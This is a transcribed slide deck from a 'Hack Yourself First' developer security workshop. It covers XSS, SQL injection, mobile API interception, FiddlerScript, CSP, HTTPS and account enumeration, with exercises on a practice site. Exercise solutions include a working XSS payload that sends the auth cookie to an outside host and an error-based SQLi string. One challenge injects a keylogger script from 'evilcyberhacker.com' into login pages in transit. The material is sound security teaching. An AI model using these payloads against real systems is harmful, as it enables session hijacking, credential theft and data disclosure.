Post on 19-Jan-2016
Hack Yourself First
Troy Hunt@troyhunt
troyhunt.comtroyhunt@hotmail.com
We’re gonna turn you into lean, mean
hacking machines!
Because if we don’t, these kidsare going to hack you
Ryan Cleary, 20(and his mum)
Jake Davies, 19(and his mum)
Curtis Gervais, 16, awaiting trial(probably with his mum)
Who are we protecting our assets from?
Hacker Competency
Hacker Resources
Bored kids
Pocket money
Super Hackers
$10.8Bper
annum
Common Thieves
Can invest where ROI
makes sense
Your Hacker Tools for Today
• A Wi-Fi connection• A mobile device you can configure a proxy on
– I have a few spares
• Google Chrome– Or another browser with good dev tools
• Fiddler – getfiddler.com– Or another HTTP proxy like charlesproxy.com
What we’ll be covering on day 1Introduction – 30 mins 09:00Discovering risks via the browser – 30 mins
09:30
Using an HTTP proxy – 30 mins 10:00
Break – 15 mins 10:30
XSS – 50 mins 10:45
SQL injection part 1 – 55 mins 11:35
Lunch – 1 hour 12:30
Mobile APIs – 60 mins 13:30
Content Security Policy – 50 mins 14:30
Break – 15 mins 15:20
Account Enumeration – 30 mins 15:35
HTTPS – 55 mins 16:05
Close 17:00
Discovering risks via the browser
Exercise 1
Exercise 1 – Chrome developer tools
• Familiarise yourself with the dev tools– Elements, network, cookies, console, por… uh,
incognito
• Create an account at hackyourselffirst.troyhunt.comHacker Challenge 1:
Identify three security risks with the registration process
Using an HTTP proxyExercise 2
Exercise 2 – Using an HTTP proxy
• Familiarise yourself with Fiddler– Watch requests and their headers, review
response body and headers, use the composer to reissue request
Hacker Challenge 2:Use Fiddler to vote multiple times on 1 car with your ID
Reflected cross site scripting (XSS)
Exercise 3
Understanding XSS
mysite.com/?q=<script>alert('Yay XSS!');</script>
<p>You searched for <%= Request.QueryString["q"] %></p>
<p>You searched for <script>alert('Yay XSS!');</script></p>
mysite.com/?q=ferrari
<p>You searched for ferrari</p>
Some quick XSS tips
• Check the encoding context– You encode for HTML differently than for
JavaScript
• Check the encoding consistency– Often it’s manual and some characters are not
encoded
• Play with JavaScript to:– Manipulate the DOM, access cookies, load
external resources
Exercise 3 – XSS
• Establish the encoding practices on the search page– What’s encoded, what’s not, what contexts are
encoding
• What can be accessed or manipulated in the DOM
Hacker Challenge 3:Create an XSS attack that sends the auth cookie to another site
Exercise 3 solution
http://hackyourselffirst.troyhunt.com/Search?searchTerm=');document.location='http://www.troyhunt.com/?
c='%2bdocument.cookie;//
SQL injection (SQLi)Exercise 4
Understanding SQLi
mysite.com/?id=foo
var query = "SELECT * FROM Widget WHERE Id = "query += Request.Query["id"]
SELECT * FROM Widget WHERE Id = foo
mysite.com/?id=1
SELECT * FROM Widget WHERE Id = 1
Invalid column name 'foo'
Some quick SQLi tips
• Think of SQL commands which disclose structure– sys.tables, sys.columns, system commands
• Consider how you’d enumerate through records– Select top x rows asc then top 1 rows from that
desc
• Write out how you think the query works internally– SELECT * FROM Supercar ORDER BY [URL
param]
Exercise 4 – SQLi
• Explore the database using error-based SQLi– Construct strings to disclose internal data– Cast things to invalid types to disclose via
exceptionsHacker Challenge 4:Discover the version of the DB
Exercise 4 solution
http://hackyourselffirst.troyhunt.com/Make/1?orderby=@@VERSION*1
Mobile APIsExercise 5
Understanding mobile APIs
Who are we protecting our APIs from?
Attacker
Attacker
HTTP(S)
Trusting the Fiddler root cert
http://ipv4.fiddler:8888
Some quick mobile API tips
• Look at the HTTP requests for sensitive data– Credentials, account info, PII
• Remove the proxy’s root cert and make HTTPS requests– Is cert validation actually enabled in the app?
• In your own apps:– Parameter tampering, auth bypass, direct object
refs
Exercise 5 – Mobile APIs
• Proxy your device through Fiddler or Charles– Inspect the traffic of your apps– Perform normal activities and monitor requests
Hacker Challenge 5:Find three “things of interest” – doesn’t have to be security related
FiddlerScriptExercise 6
Understanding FiddlerScript
• Highlight particular request / response patterns
• Modify requests or responses in transit• Good representation of what can be done
with intercepted traffic• Also great for causing apps to
“misbehave”!
Some quick FiddlerScript tips
• Make good use of the FiddlerScript CookBook– Google it – first result
• Wrap conditions around response parsing for better perf– Host name / path / content type / method
• Don’t forget to hit the “Save Script” button!– Plus debugging can be painful…
Exercise 6 – FiddlerScript
• Modify the traffic returned to your app– Identify request / response patterns of an app– Manipulate request / response to cause
misbehaviour
Hacker Challenge 6:Proxy your mobile device and cause one of your apps to do something… “interesting”
Content Security Policy (CSP)Exercise 7
Without a CSP
• Anything can be added to the page via a reflected XSS risk
• Anything can be added to the DOM downstream of the server– …and you have no idea when this one is
happening!
With a CSP
• The browser will only load resources you white-list– Local resources– Remote resources
• Any violations can be reported– If you’re nervous, you always just report and
not block
Some quick CSP tips
• Create a white list of what should be allowed to run
• Start with nothing and see what breaks– In development!
• Use the report feature to track exceptions– You’ll learn some interesting things…
Exercise 7 – CSP
• Falafel needs help!– They have no CSP and they’re a financial
institution!– We can add one ourselves in transit
Hacker Challenge 7:Write a CSP for a site and embed it using FiddlerScript
Injecting the CSP header
if (oSession.HostnameIs("www.americanexpress.com")) { oSession.oResponse.headers["Content-Security-Policy"] = …;}
HTTPSExercise 8
Understanding HTTPS
Confidentiality Integrity Authenticity
Some quick HTTPS tips
• Consider everything sent over HTTP to be compromised– Sometimes that won’t matter… much
• Also look at HTTPS content embedded in untrusted pages– Iframes– Links to HTTPS
Exercise 8 – HTTPS
• You can’t trust insecure login forms!– The form can be manipulated in transit– Manipulate it to capture the “secure”
credentials in transit
Hacker Challenge 8:Inject a JavaScript keylogger into an insecure login page using Fiddler script
Injecting the keylogger
evilcyberhacker.com/keylogger.js
Set the “destination” JavaScript variable
Account enumerationExercise 9
Understanding account enumeration
Does john@gmail.com have an account?
No
Does mary@gmail.com have an account?
No
Does max@gmail.com have an account?
Yes
Some quick account enumeration tips
• There are usually multiple vectors for identifying the existence of an account
• There may or may not be anti-automation defence– And it may be inconsistent across vectors
• It may or may not even matter…– Very dependent on the nature
Exercise 9 – Account enumeration
• Identify vectors for account enumeration– Think about how to “ask” the site about an
account– Identify positive versus negative responses
Hacker Challenge 9:Identify 3 sites you use that disclose the presence of your account